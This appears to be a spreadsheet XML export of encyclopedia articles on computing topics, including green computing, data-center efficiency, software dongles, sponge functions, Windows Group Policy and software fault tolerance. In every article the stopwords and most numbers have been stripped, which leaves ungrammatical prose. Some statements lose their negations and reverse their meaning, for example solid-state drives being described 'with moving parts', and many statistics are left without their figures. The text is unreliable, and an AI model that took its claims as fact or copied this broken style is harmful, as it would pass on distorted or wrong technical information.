siting decisions. approaches actually reduce energy consumption network devices proper network/device management techniques surveyed authors grouped approaches main strategies, namely adaptive link rate (alr), (ii) interface proxying, (iii) energy aware infrastructure, (iv) energy aware applications. virtualizing computer virtualization refers abstraction computer resources, process running logical computer systems physical hardware. concept originated mainframe operating systems 1960s, commercialized x86-compatible computers 1990s. with virtualization, system administrator could combine several physical systems virtual machines single, powerful system, thereby conserving resources removing need original hardware reducing power cooling consumption. virtualization assist distributing work servers either busy low-power sleep state. several commercial companies open-source projects offer software packages enable transition virtual computing. intel corporation also built proprietary virtualization enhancements instruction product lines, order facilitate virtual computing. virtual technologies, operating-system-level virtualization also used reduce energy consumption. these technologies make efficient resources, thus reducing energy consumption design. also, consolidation virtualized technologies efficient done virtual machines, services deployed physical machine, reducing amount hardware needed. terminal servers terminal servers also used green computing. when using system, users terminal connect central server; actual computing done server, user experiences operating system terminal. these combined thin clients, amount energy normal workstation, resulting decrease energy costs consumption. there increase using terminal services thin clients create virtual labs. examples terminal server software include terminal services windows linux terminal server project (ltsp) linux operating system. software-based remote desktop clients windows remote desktop realvnc provide similar thin-client functions power, commodity hardware connects server. power management advanced configuration power interface (acpi), open industry standard, allows operating system directly control power-saving aspects underlying hardware. this allows system automatically turn components monitors hard drives periods inactivity. addition, system hibernate, components (including system ram) turned off. acpi successor earlier intel-microsoft standard called advanced power management, allows computer's bios control power management functions.some programs allow user manually adjust voltages supplied cpu, reduces amount heat produced electricity consumed. this process called undervolting. some cpus automatically undervolt processor, depending workload; technology called "speedstep" intel processors, "powernow!"/"cool'n'quiet" chips, longhaul cpus, longrun transmeta processors. data center power data centers, criticized extraordinarily high energy demand, primary focus proponents green computing. according greenpeace study, data centers represent electricity consumed sector, billion year.data centers potentially improve energy space efficiency techniques storage consolidation virtualization. many organizations aiming eliminate underutilized servers, results lower energy usage. u.s. federal government minimum reduction target data center energy usage 2011. with self-styled ultraefficient evaporative cooling technology, google inc. able reduce energy consumption industry average. operating system support microsoft windows included limited power management features since windows these initially provided stand-by (suspend-to-ram) monitor power state. further iterations windows added hibernate (suspend-to-disk) support acpi standard. windows 2000 first nt-based operating system include power management. this required major changes underlying operating system architecture hardware driver model. windows 2000 also introduced group policy, technology allowed administrators centrally configure windows features. however, power management features. this probably power management settings design relied upon connected per-user per-machine binary registry values, effectively leaving user configure power management settings. this approach, compatible windows group policy, repeated windows reasons design decision microsoft known, resulted heavy criticism. microsoft significantly improved windows vista redesigning power management system allow basic configuration group policy. support offered limited single per-computer policy. recent release, windows retains limitations include refinements timer coalescing, processor power management, display panel brightness. significant change windows user experience. prominence default high performance power plan reduced encouraging users save power. there significant market third-party power management software offering features beyond present windows operating system. available. most products offer active directory integration per-user/per-machine settings advanced offering multiple power plans, scheduled power plans, anti-insomnia features enterprise power usage reporting. notable vendors include nightwatchman, data synergy powerman (software), faronics power save, verdiem surveyor enviprot auto shutdown managerlinux systems started provide laptop-optimized power-management 2005, power-management options mainstream since 2009. power supply desktop computer power supplies general 70–75% efficient, dissipating remaining energy heat. certification program called plus certifies psus least efficient; typically models drop-in replacements older, less efficient psus form factor. july 2007, energy star 4.0-certified desktop psus must least efficient. storage smaller form factor (e.g., inch) hard disk drives often consume less power gigabyte physically larger drives. unlike hard disk drives, solid-state drives store data flash memory dram. with moving parts, power consumption reduced somewhat low-capacity flash-based devices.as hard drive prices fallen, storage farms tended increase capacity make data available online. this includes archival backup data would formerly saved tape offline storage. increase online storage increased power consumption. reducing power consumed large storage arrays, still providing benefits online storage, subject ongoing research. video card fast largest power consumer computer.energy-efficient display options include: video card shared terminal, shared thin client, desktop sharing software display required. motherboard video output typically performance power. select based idle power, average wattage, performance watt. display unlike display technologies, electronic paper power displaying image. monitors typically power monitors. they also contain significant amounts lead. monitors typically cold-cathode fluorescent bulb provide light display. some newer displays array light-emitting diodes (leds) place fluorescent bulb, reduces amount electricity used display. fluorescent back-lights also contain mercury, whereas back-lights not. light-on-dark color scheme, also called dark mode, color scheme requires less energy display display technologies, oled. this positively impacts battery life energy consumption. while oled consume around power displaying image primarily black, three times much power display image white background, document site. this lead reduced battery life energy usage, unless light-on-dark color scheme used. 2018 article popular science suggests "dark mode easier eyes battery" displaying white full brightness uses roughly times much power pure black google pixel, oled display. 2019, apple announced light-on dark mode available across native applications ipados. also possible third-party developers implement dark themes. google announced official dark mode coming android release android materials recycling recycling computing equipment keep harmful materials lead, mercury, hexavalent chromium landfills, also replace equipment otherwise would need manufactured, saving energy emissions. computer systems outlived particular function re-purposed, donated various charities non-profit organizations. however, many charities recently imposed minimum system requirements donated equipment. additionally, parts outdated systems salvaged recycled certain retail outlets municipal private recycling centers. computing supplies, printer cartridges, paper, batteries recycled well.a drawback many schemes computers gathered recycling drives often shipped developing countries environmental standards less strict north america europe. silicon valley toxics coalition estimates post-consumer e-waste collected recycling shipped abroad countries china india.in 2011, collection rate e-waste still low, even ecology-responsible countries like france. country, e-waste collection still annual rate electronic equipment sold e-waste collected 2006 2009.the recycling computers raises important privacy issue. storage devices still hold private information, emails, passwords, credit card numbers, recovered simply someone's using software available freely internet. deletion file actually remove file hard drive. before recycling computer, users remove hard drive, hard drives one, physically destroy store somewhere safe. there authorized hardware recycling companies computer given recycling, typically sign non-disclosure agreement. cloud computing cloud computing addresses major challenges related green computing energy usage resource consumption. virtualization, dynamic provisioning environment, multi-tenancy, green data center approaches enabling cloud computing lower carbon emissions energy usage great extent. large enterprises small businesses reduce direct energy consumption carbon emissions respectively moving certain on-premises applications cloud. common example includes online shopping helps people purchase products services internet without requiring drive waste fuel reach physical shop, which, turn, reduces greenhouse emission related travel. edge computing technologies edge computing solution reducing energy consumption. these technologies allow redistributing computation near use, thus reducing energy costs network. furthermore, smaller data centers, energy used operations refrigerating maintenance gets largely reduced. remote work remote work using teleconference telepresence technologies often implemented green computing initiatives. advantages many; increased worker satisfaction, reduction greenhouse emissions related travel, increased profit margins result lower overhead costs office space, heat, lighting, etc. savings significant; average annual energy consumption u.s. office buildings kilowatt hours square foot, heat, conditioning lighting accounting energy consumed. other related initiatives, hoteling, reduce square footage employee workers reserve space need many types jobs, sales, consulting, field service, integrate well technique. voice (voip) reduces telephony wiring infrastructure sharing existing ethernet copper. voip phone extension mobility also made desking practical. wi-fi consume times less energy telecommunication network devices energy indices information communication technologies (icts) energy consumption, worldwide, estimated respectively 9.4% 5.3% total electricity produced. energy consumption icts today significant even compared industries. some study tried identify energy indices allow relevant comparison different devices (network elements). this analysis focused optimise device network consumption carrier telecommunication itself. target allow immediate perception relationship network technology environmental effect. these studies start fill sector still huge research necessary. supercomputers inaugural green500 list announced november 2007, sc|07. complement top500, unveiling green500 ushered supercomputers compared performance-per-watt. 2019, japanese supercomputers topped green500 energy efficiency ranking performance exceeding gflops/watt, ac922 systems followed performance exceeding gflops/watt. education certification green computing programs degree postgraduate programs provide training range information technology concentrations along sustainable strategies effort educate students build maintain systems reducing harm environment. australian national university (anu) offers "ict sustainability" part information technology engineering masters programs. athabasca university offer similar course "green strategies", adapted course notes worthington. leeds beckett university offers sustainable computing program full part-time access modes. green computing certifications some certifications demonstrate individual specific green computing knowledge, including: green computing initiative offers certified green computing user specialist (cgcus), certified green computing architect (cgca) certified green computing professional (cgcp) certifications. comptia strata green designed managers show good knowledge green practices methods important incorporate organization. information systems examination board (iseb) foundation certificate green appropriate showing overall understanding awareness green computing implementation beneficial. singapore infocomm technology federation (sitf) singapore certified green professional industry endorsed professional level certification offered sitf authorized training partners. certification requires completion four-day instructor-led core course, plus one-day elective authorized vendor. australian computer society (acs) offers certificate "green technology strategies" part computer professional education program (cpep). award certificate requires completion 12-week e-learning course designed worthington, written assignments. ratings since 2010, greenpeace maintained list ratings prominent technology companies several countries based clean energy used company ranging (the best) (the worst). energy demand digitalization brought additional energy consumption; energy-increasing effects greater energy-reducing effects. four energy consumption increasing effects are: direct effect strong increases (technical) energy efficiency countered growth sector. efficiency rebound effects rebound effects significantly high increased productivity often leads behaviors energy intensive. economic growth positive effect digitalization economic growth. sectoral change growth services tends replace, come existing services. also computational sustainability energy star references further reading green factsheet university michigan's center sustainable systems</t>
  </si>
  <si>
    <t>Green data center</t>
  </si>
  <si>
    <t>green data center, sustainable data center, service facility utilizes energy-efficient technologies. they contain obsolete systems (such inactive underused servers), take advantage newer, efficient technologies. with exponential growth usage internet, power consumption data centers increased significantly. resulting environmental impact, increase public awareness, higher cost energy legislative action, increased pressure placed companies follow green policy. reasons, creation sustainable data centers become essential environmental business sense. energy high-performance computing techniques increased, trading energy consumption increased performance. industry estimates suggest data centers consume three five percent world's global energy. according afcom state data center survey, percent data-center providers indicated power density rack increased significantly since 2013. managers forced find ways power data centers renewable energy sources hydro, solar, geothermal, wind. more efficient technologies developed decrease data-center power consumption. metrics several metrics developed measure power efficiency data centers. power usage effectiveness (pue) carbon usage effectiveness (cue) frequently-used metrics created green grid (tgg), global consortium dedicated advancing energy efficiency data centers. power usage effectiveness invented 2007, proposed guidelines measure energy data centers. total facility power equipment power {\displaystyle \mathrm {pue} ={{\mbox{total facility power}} \over {\mbox{it equipment power}}}} this ratio describes much extra energy data center needs maintain equipment every watt delivered equipment. best data center ideal situation, extra energy use. when introduced, studies found industry-average recent studies, average fell using framework. began shift data-center industry towards energy efficiency. although most-frequently-used metric data centers measure energy efficiency, reliability still debated; carbon usage effectiveness carbon usage effectiveness (cue) another metric used measure energy usage sustainability data centers. calculated following formula: {\displaystyle \mathrm {cue} ={\frac {total{\rm {{co_{2}}emissionscaused}}}{itequipmentpower}}} another express formula product carbon dioxide emission factor (cef) pue, {\displaystyle {\ce {co2}}} produced kilowatt-hour electricity: {\displaystyle \mathrm {cue} ={\frac {\rm {{co_{2}}emitted(kg{\rm {{co_{2}}eq)}}}}{unitofenergy(kwh)}}} {\displaystyle {\frac {totalfacilitypower}{itequipmentpower}}} certifications data centers united states apply certified green data centers. widely used green building rating system leadership energy environmental design (leed). developed u.s. green building council, available several categories. depending ratings, data centers receive silver, gold platinum certification. platinum certification given data centers highest level environmentally-responsible construction efficient resources.data centers also certified national data center energy efficiency information program energy star, part initiative u.s. environmental protection agency u.s. department energy. program certifies buildings consumer products energy efficiency. only data centers percent energy performance receive energy star certification. technologies several technologies increase efficiency decrease energy consumption data centers. low-power servers low-power servers energy-efficient conventional servers data centers. they technology smartphone computing, tries balance performance energy consumption. first low-power servers introduced 2012 large providers dell hewlett-packard. used correctly, low-power servers much efficient conventional servers. they significant impact data-center efficiency, decreasing power consumption operating cost cooling facilities. modular data centers modular data center portable data center placed anywhere data capacity needed. compared traditional data centers, designed rapid deployment, energy efficiency high density. these ready-made data centers became popular. ecopod modular data center supports 4,000 data centers rating 1.05 free-air cooling. free cooling free cooling systems uses external wind instead traditional data-center computer room conditioner (crac) units. although outdoor still needs filtered moisturized, much less energy required cool data center method. outdoor temperature issue here, data center's location plays critical role technology. cold aisle containment method, rows racks aligned backs servers facing other; aisles enclosed, capture air. aisle containment, heat produced servers pumped cooling units. cold aisle containment, cold pumped enclosed aisles. both containment methods effective traditional cooling technologies, help reduce energy consumption (and impact). although difficult implement, aisle containment effective cold aisle containment. reusing waste heat data centers electric power, releasing percent electricity heat. waste heat actively reused, data center becomes closed-loop heating system waste. examples include: reusing data center switzerland, heat warms local swimming pool finland, yandex academica data centers replacing heat used 500-1,000 homes data-center energy. amazon reused heat nearby data center biosphere project seattle. ultrasonic humidification some humidity necessary data centers work efficiently prevent damage devices servers. ultrasonic humidification uses ultrasound create moisture, using percent less energy conventional methods resistance steam humidifiers. evaporative cooling evaporative cooling reduces heat evaporation water. main methods used: evaporation pads high-pressure spray systems. with evaporation pads popular method drawn pads, making water evaporate cooling air. technique, high-pressure spray systems, needs larger area consumes energy pumps. evaporative cooling dependent geographical location season, affect moisture level air. compared traditional mechanical cooling systems, evaporative cooling generally uses significantly less electricity. investment green data center according study arizton advisory intelligence, total investment green data center market across globe marked $35.58 billion 2021. investment expected grow cagr 7.6%. references</t>
  </si>
  <si>
    <t>Software standard</t>
  </si>
  <si>
    <t>software standard standard, protocol, common format document, file, data transfer accepted used software developers working computer programs. software standards enable interoperability different programs created different developers. used applied software standards consist certain terms, concepts, data formats, document styles techniques agreed upon software creators software understand files data created different computer program. considered standard, certain protocol needs accepted incorporated group developers contribute definition maintenance standard. some developers prefer using standards software development efficiencies provides code development wider user acceptance resulting application.for example, protocols html, tcp/ip, smtp, software standards application designers must understand follow software expects interface standards. instance, order email sent microsoft outlook read within yahoo! mail application, email sent using smtp, different receiving program understands parse properly display email. without standardized technique send email, different programs would unable accurately share display delivered information. some widely used data formats, understood used variety computer programs, considered software standard. microsoft office file formats, .doc .xls, commonly converted computer programs use, still owned controlled microsoft, unlike text files (txt rtf.) creation order parties agree certain software standard make software connect other, software standards organizations like isoc consist groups larger software companies like microsoft apple inc. representatives companies contribute ideas make single, unified software standard address data problem trying handle. complexity standard vary depending kind problem trying solve. instance (file transfer protocol) tries solve different problem smtp, concerned sending receiving email. standards also need simple, maintainable understandable. software standard document create needs detail every possible condition, types, elements, etc. order retain utility serve role created. open versus closed standards standard closed standard open standard. documentation open standard open public anyone create software implements uses standard. documentation specification closed standards available public, enabling developer sell license code manage data format interested software developers. while process increases revenue potential useful file format, limit acceptance drive adoption similar, open standard instead. also list computer standards list file formats references</t>
  </si>
  <si>
    <t>Gridwars</t>
  </si>
  <si>
    <t>gridwars (aka grid wars) programming contest announced november 2002 engineered intelligence (ei). competition devised promote ei's product called parallel programming language) introduced day. gridwars also announced selected forums personal invitations.four contests held total: february 2003, june 2003 (gridwars ii), november 2003 (gridwars interactive), april 2004 (gridwars iii). founded matt oberdorfer; late 2005 discontinued announced product called "i/o accelerator". early 2006 changed name gear6 replaced gridwars front page announcement discontinuation. shortly site www.gridwars.com shut down. game concept core rules game played board "battlefield"—orthogonal grid given size drawn torus (thus opposite edges field contact). each cell battlefield either empty owned several codes competing cells battlefield. code manages take battlefield owns cells specified number cycles winner. original terminology used peculiar referred competing codes "the warriors" cells "processors" virtual computing grid (hence "the battle processors") capable, however, "firing bullets" other. game proceeds turns (cycles). beginning game, code owns cell. every cycle, codes executed cells own. happens, framework program supplies codes data: cell's eight immediate neighbors warrior number, free cell) warrior number. based data, warriors "fire three bullets" one/two/three neighbors. gridwars introduced principal extension original rules: warriors could return 32-bit word, called communication variable comvar short, framework program would supply neighbors next cycle battle execution. after cells made shots, control program evaluates many bullets total arrived every cell neighboring warriors, i.e. cells executing code. whichever warrior sends bullets cell (and less three total), takes over. case tie, cell ownership remains same. principle, game played without computer: board whose size small enough make fun. players private boards paper specify shooting directions cells show shots update board together. alternatively, firing directions specified main board cell-by-cell manner (using matches, example), opponents taking turns. winners with exception gridwars interactive, three finishers competition honored ei's press releases received prizes provided hewlett-packard sponsored gridwars (pocket pcs, digital cameras, printers, 5-node xeon cluster winner gridwars iii). gridwars1. scott balaban (cleveland, ohio) john ours (cleveland, ohio) robert macrae (london, gridwars ii1. vasiliy gromov (moscow, russia) mark wenig (maryland, usa) robert macrae (london, mega grid wars league gridwars robert macrae (london, paul klinge (vtt, finland) shanming (singapore) gridwars mark wenig (greenbelt, maryland, usa) paul klinge (vtt, finland) chris mueller (katy, texas, usa) interests objectivity, table provides additional details regard participation. there reports forum certain codes prior competition resubmitted participation available information kind taken account. press media event attracted attention press was, far, gridwars particular, final battle programs written vasily gromov mark wenig: scientist: "gladiator-style 'wars' select weak programs"new scientist: "russian programmer defeats nasa code war"bbc russian: "nasa programmer bitten cobra"russian channel news: "our vasa beaten nasa" footnotes</t>
  </si>
  <si>
    <t>Software protection dongle</t>
  </si>
  <si>
    <t>software protection dongle (commonly known dongle key) electronic copy protection content protection device. when connected computer electronics, unlock software functionality decode content. hardware programmed product cryptographic protection mechanism functions electrical connector external computer appliance.in software protection, dongles two-interface security tokens transient data flow pull communication reads security data dongle. absence dongles, certain software restricted mode, all. addition software protection, dongles enable functions electronic devices, receiving processing encoded video streams television sets. etymology merriam-webster dictionary states "first known dongle" 1981 etymology "perhaps alteration dangle." dongles rapidly evolved active devices contained serial transceiver (uart) even microprocessor handle transactions host. later versions adopted interface, became preferred choice serial parallel interface.a 1992 advertisement rainbow technologies claimed word dongle derived name "don gall". though untrue, given rise urban myth. usage efforts introduce dongle copy-protection mainstream software market stiff resistance users. such copy-protection typically used expensive packages vertical market software cad/cam software, cellphone flasher/jtag debugger software, micros systems hospitality special retail software, digital audio workstation applications, translation memory packages. cases prepress printing software, dongle encoded specific, per-user license key, enables particular features target application. this form tightly controlled licensing, allows vendor engage vendor lock-in charge would otherwise product. example kodak licenses prinergy customers: when computer-to-plate output device sold customer, prinergy's license cost provided separately customer, base price contains little required licenses output work device. dongles also part steinberg's audio production editing systems, cubase, wavelab, hypersonic, halion, others. dongle used steinberg's products also known steinberg key. steinberg purchased separately counterpart applications generally comes bundled "syncrosoft license control center" application, cross-platform compatible windows. some software developers traditional flash drives software license dongles contain hardware serial numbers conjunction stored device strings, generally easily changed end-user. developer also dongle store user settings even complete "portable" version application. flash drives suitable use, manufacturers install unique serial numbers devices. although medium security deter casual hacker, lack processor core dongle authenticate data, perform encryption/decryption, execute inaccessible binary code makes passive dongle inappropriate lowest-priced software. simpler even less secure option unpartitioned unallocated storage dongle store license data. common flash drives relatively inexpensive compared dedicated security dongle devices, reading storing data flash drive easy intercept, alter, bypass. issues there potential weaknesses implementation protocol dongle copy-controlled software. example, simple implementation might define function check dongle's presence, returning "true" "false" accordingly, dongle requirement easily circumvented modifying software always answer "true". modern dongles include built-in strong encryption fabrication techniques designed thwart reverse engineering. typical dongles also contain non-volatile memory essential parts software actually stored executed dongle. thus dongles become secure cryptoprocessors execute program instructions input cryptoprocessor encrypted form. original secure cryptoprocessor designed copy protection personal computer software (see patent 4,168,396, sept 1979) provide security dongles could provide. also encryption. hardware cloning, dongle emulated device driver, also threat traditional dongles. thwart this, dongle vendors adopted smart card product, widely used extremely rigid security requirement environments military banking, dongle products. innovative modern dongle designed code porting process transfers encrypted parts software vendor's program code license enforcement secure hardware environment (such smart card mentioned above). port thousands lines important computer program code dongle.in addition, dongles criticized hardware, easily lost prone damage, potentially increasing operational costs device cost delivery cost. game consoles some unlicensed titles game consoles (such super noah's little hood) used dongles connect officially licensed cartridges, order circumvent authentication chip embedded console.some cheat code devices, gameshark action replay dongle. typically attaches memory card slot system, disc based software refusing work dongle detected. dongle also used holding settings storage codes, added either user official updates, disc, read only, cannot store them. some dongles also double normal memory cards. also digital rights management hardware restrictions license manager lock-out chip product activation security token trusted client software monetization references external links jargon file: dongle</t>
  </si>
  <si>
    <t>Sponge function</t>
  </si>
  <si>
    <t>cryptography, sponge function sponge construction class algorithms finite internal state take input stream length produce output stream desired length. sponge functions theoretical practical uses. they used model implement many cryptographic primitives, including cryptographic hashes, message authentication codes, mask generation functions, stream ciphers, pseudo-random number generators, authenticated encryption. construction sponge function built three components: state memory, containing bits, function {\displaystyle f:\{0,1\}^{b}\rightarrow \{0,1\}^{b}} transforms state memory (often pseudorandom permutation {\displaystyle 2^{b}} state values) padding function pthe state memory divided sections: size (the bitrate) remaining part size (the capacity). these sections denoted respectively. padding function appends enough bits input string length padded input whole multiple bitrate, padded input thus broken r-bit blocks. operation sponge function operates follows: state initialized zero input string padded. this means input transformed blocks bits using padding function r-bit block padded input: replaced (using bitwise xor) replaced f(s)this process "absorbs" sponge metaphor) blocks padded input string. sponge function output ready produced ("squeezed out") follows: portion state memory output repeat enough bits output: replaced f(s) portion state memory outputif less bits remain output, truncated (only part output). another metaphor describes state memory "entropy pool", input "poured into" pool, transformation function referred "stirring entropy pool".note input bits never xored portion state memory, bits ever output directly. extent altered input depends entirely transformation function hash applications, resistance collision preimage attacks depends size (the "capacity" typically twice desired resistance level. duplex construction also possible absorb squeeze alternating fashion. this operation called duplex construction duplexing. basis single pass authenticated encryption system. state initialized zero xored first r-bit block input replaced f(s) first bits output. xored next r-bit block input replaced f(s) next bits output. overwrite mode possible omit operations absorption, still maintaining chosen security level. mode, absorbing phase, next block input overwrites part state. this allows keeping smaller state steps. since part overwritten anyway, discarded advance, part must kept. applications sponge functions theoretical practical uses. theoretical cryptanalysis, random sponge function sponge construction random permutation transformation, appropriate. random sponge functions capture practical limitations cryptographic primitives widely used random oracle model, particular finite internal state.the sponge construction also used build practical cryptographic primitives. example, keccak cryptographic sponge 1600-bit state selected nist winner sha-3 competition. strength keccak derives intricate, multi-round permutation authors developed. rc4-redesign called spritz refers sponge-construct define algorithm. examples, sponge function used build authenticated encryption associated data (aead), well password hashing schemes. references</t>
  </si>
  <si>
    <t>Group Policy</t>
  </si>
  <si>
    <t>group policy feature microsoft windows family operating systems (including windows windows 8.1, windows windows windows server 2003+) controls working environment user accounts computer accounts. group policy provides centralized management configuration operating systems, applications, users' settings active directory environment. group policy configurations called group policy object (gpo). version group policy called local group policy (lgpo localgpo) allows group policy object management without active directory standalone computers.active directory servers disseminate group policies listing ldap directory objects class grouppolicycontainer. these refer fileserver paths (attribute gpcfilesyspath) store actual group policy objects, typically share \\domain.com\sysvol shared active directory server. group policy registry settings, associated file share file registry.pol registry settings client needs apply.the policy editor (gpedit.msc) provided home versions windows xp/vista/7/8/8.1/10/11. operation group policies, part, control users cannot computer system. example, group policy used enforce password complexity policy prevents users choosing overly simple password. other examples include: allowing preventing unidentified users remote computers connect network share, block/restrict access certain folders. configurations called group policy object (gpo). part microsoft's intellimirror technologies, group policy aims reduce cost supporting users. intellimirror technologies relate management disconnected machines roaming users include roaming user profiles, folder redirection, offline files. enforcement accomplish goal central management group computers, machines receive enforce gpos. resides single machine applies computer. apply group computers, group policy relies active directory third-party products like zenworks desktop management) distribution. active directory distribute gpos computers belong windows domain. default, microsoft windows refreshes policy settings every minutes random minutes offset. domain controllers, microsoft windows every five minutes. during refresh, discovers, fetches applies gpos apply machine logged-on users. some settings automated software installation, drive mappings, startup scripts logon scripts apply startup user logon. since windows users manually initiate refresh group policy using gpupdate command command prompt.group policy objects processed following order (from bottom): local settings computer's local policy. prior windows vista, local group policy stored computer. windows vista later windows versions allow individual group policies user accounts. site group policies associated active directory site computer resides. active directory site logical grouping computers, intended facilitate management computers based physical proximity.) multiple policies linked site, processed order administrator. domain group policies associated windows domain computer resides. multiple policies linked domain, processed order administrator. organizational unit group policies assigned active directory organizational unit (ou) computer user placed. (ous logical units help organizing managing group users, computers active directory objects.) multiple policies linked processed order administrator.the resulting group policy settings applied given computer user known resultant policy (rsop). rsop information displayed computers users using gpresult command. inheritance policy setting inside hierarchical structure ordinarily passed parent children, children grandchildren, forth. this termed inheritance. blocked enforced control policies applied level. higher level administrator (enterprise administrator) creates policy inheritance blocked lower level administrator (domain administrator), policy still processed. where group policy preference settings configured also equivalent group policy setting configured, value group policy setting take precedence. filtering filtering process customizing scope choosing (wmi) filter apply. these filters allow administrators apply example, computers specific models, ram, installed software, anything available queries. local group policy local group policy (lgp, localgpo) basic version group policy standalone non-domain computers, existed least since windows applied domain computers. prior windows vista, could enforce group policy object single local computer, could make policies individual users groups. from windows vista onward, allow local group policy management individual users groups well, also allows backup, importing exporting policies standalone machines "gpo packs" group policy containers include files needed import policy destination machine. group policy preferences group policy preferences administrator policies mandatory, optional user computer. there group policy setting extensions previously known policymaker. microsoft bought policymaker integrated windows server 2008. microsoft since released migration tool allows users migrate policymaker items group policy preferences.group policy preferences adds number configuration items. these items also number additional targeting options used granularly control application setting items. group policy preferences compatible versions windows windows server 2003, windows vista addition client side extensions (also known cse).client side extensions included windows server 2008, windows windows server 2008 group policy management console originally, group policies modified using group policy edit tool integrated active directory users computers microsoft management console (mmc) snap-in, later split separate snap-in called group policy management console (gpmc). gpmc user component windows server 2008 windows server 2008 provided download part remote server administration tools windows vista windows advanced group policy management microsoft also released tool make changes group policy called advanced group policy management (a.k.a. agpm). this tool available organization licensed microsoft desktop optimization pack (a.k.a. mdop). this advanced tool allows administrators check in/out process modification group policy objects, track changes group policy objects, implement approval workflows changes group policy objects. agpm consists parts server client. server windows service stores group policy objects archive located computer network share. client snap-in group policy management console, connects agpm server. configuration client performed group policy. security group policy settings enforced voluntarily targeted applications. many cases, merely consists disabling user interface particular function.alternatively, malevolent user modify interfere application cannot successfully read group policy settings, thus enforcing potentially lower security defaults even returning arbitrary values. windows enhancements windows introduced feature called group policy update. this feature allows administrator force group policy update computers accounts particular organizational unit. this creates scheduled task computer runs gpupdate command within minutes, adjusted random offset avoid overloading domain controller. group policy infrastructure status introduced, report group policy objects replicated correctly amongst domain controllers.group policy results report also feature times execution individual components group policy update. also administrative templates group policy improvements windows vista workgroup manager references further reading external links official website group policy team blog group policy settings reference windows windows server force gpupdate</t>
  </si>
  <si>
    <t>Software incompatibility</t>
  </si>
  <si>
    <t>software incompatibility characteristic software components systems cannot operate satisfactorily together computer, different computers linked computer network. they components systems intended operate cooperatively independently. software compatibility characteristic software components systems operate satisfactorily together computer, different computers linked computer network. possible software components systems compatible environment incompatible another. examples deadlocks consider sequential programs form: request resource request resource perform action using release resource release resource particular program might printer (resource file (resource order print file. several programs p1,p2,p3 operate time, first execute block others resources released, programs execute turn. there problem. makes difference whether uni-processor multi-processor system used, allocation resources determines order execution. note, however, programmers are, general, constrained write programs particular way, even guidelines, differ guidelines. variant previous program request resource request resource perform action using release resource release resource resources previous example simply dummy variables, otherwise programs identical. before, several programs, q1,q2,q3 time using resources before, problem. however, several time several deadlock condition arise. note deadlock need arise, may. request resource request resource request resource (blocked request resource (blocked neither proceed1. this kind example programs demonstrate incompatibility. interface incompatibility another example different kind would software component provides service another. incompatibility could simple change order parameters software component requesting service, component providing service. this would kind interface incompatibility. this might considered bug, could hard detect systems. some interface incompatibilities easily detected build stage, particularly strongly typed systems, others hard find detected time, others almost impossible detect without detailed program analysis. consider following example: component calls component parameters example, integer. returns f(x) desired never zero, ignores variant similar behaviour, following differences: 100, terminate. never calls 100, using instead compatible computation. however calls 100, using instead lead non-terminating computation. assume f(x) numeric value, component defined behaves except terminate returns f(x) returns random value returns cause problem behaviour. calls 101, results computation incorrect, cause program failure. calls results unpredictable, failure arise, possibly divide zero errors arithmetic overflow. calls event uses result division operation, divide zero failure occur. this example shows program always compatible another constructed programs q1'' sometimes incompatible, q1'' always incompatible. performance incompatibility sometimes programs running computer, presence inhibit performance other. this particularly happen computer uses virtual memory. result disk thrashing occurs, programs significantly reduced performance. this form incompatibility occur intended cooperate, also occur completely unrelated happen time. example might program produces large output files, happen stored main memory, anti-virus program scans many files hard disk. memory cache used virtual memory, possible programs interact adversely performance drastically reduced. programs performance compatibility depend environment run. they substantially incompatible computer limited main memory, possible satisfactorily machine memory. some programs performance incompatible almost environment. also backward compatibility forward compatibility references krishna, shin, real-time systems, mcgraw-hill, 1997</t>
  </si>
  <si>
    <t>Grsync</t>
  </si>
  <si>
    <t>grsync graphical user interface rsync. rsync differential backup file synchronization tool widely used unix-like operating systems. grsync developed widget toolkit. like rsync, grsync free open-source software licensed general public license. about rsync tool creating backups linux systems. supports backing local folders, tunneling, delta-only synchronization, grsync adds ability purposes graphical user interface, without rsync's need learn complex command-line arguments. cases, easier backup files grsync rsync. since version 1.3.0, grsync gtk-3 compatibility. also back time (linux software) luckybackup references external links official website grsync sourceforge.net</t>
  </si>
  <si>
    <t>Software fault tolerance</t>
  </si>
  <si>
    <t>software fault tolerance ability computer software continue normal operation despite presence system hardware faults. fault-tolerant software ability satisfy requirements despite failures. introduction thing constant change. this certainly true software systems almost phenomenon, software change software fault tolerance methods designed overcome execution errors modifying variable values create acceptable program state. need control software fault rising challenges facing software industries today. fault tolerance must consideration early stage software development. there exist different mechanisms software fault tolerance, among which: recovery blocks n-version software self-checking software operating system failure computer applications make call using application programming interface (api) access shared resources, like keyboard, mouse, screen, disk drive, network, printer. these fail ways. blocked calls faults blocked calls blocked call request services operating system halts computer program results available. example, call blocks response becomes available remote server. this occurs every time perform action browser. intensive calculations cause lengthy delays effect blocked call. there methods used handle blocking. threads timersthreading allows separate sequence execution call block. this prevent overall application stalling waiting resource. this benefit none information state call lost activities take place. threaded languages include following. timers allow blocked call interrupted. periodic timer allows programmer emulate threading. interrupts typically destroy information related state blocked call intensive calculation, programmer must keep track information separately. un-threaded languages include following. corrupted state occur timers. this avoided following. track software state semaphore blocking faults fault induced signals posix compliant systems, signals originate calls, operating system, applications. signal handler code becomes fault causes premature application termination. handler function performed on-demand application receives signal. this called exception handling. termination signal signal cannot handled. signals directed handler function. handler functions come broad varieties. initialized in-lineinitialized handler functions paired signal software starts. this causes handler function startup corresponding signal arrives. this technique used timers emulate threading. in-line handler functions associated call using specialized syntax. familiar following used java. api_call(); catch signal_handler_code; hardware failure hardware fault tolerance software requires following. backup redundancybackup maintains information event hardware must replaced. this done ways. automatic scheduled backup using software manual backup regular schedule information restorebackup requires information-restore strategy make backup information available replacement system. restore process usually time-consuming, information unavailable restore process complete. redundancy relies replicating information computer computing device recovery delay brief. this achieved using continuous backup live system remains inactive needed (synchronized backup). this also achieved replicating information created multiple identical systems, eliminate recovery delay. also built-in self-test built-in test equipment fault-tolerant design fault-tolerant system fault-tolerant computer system immunity-aware programming logic built-in self-test n-version programming safety engineering opensaf service availability references further reading software fault tolerance, chris inacio carnegie mellon university (1998)</t>
  </si>
  <si>
    <t>Grøstl</t>
  </si>
  <si>
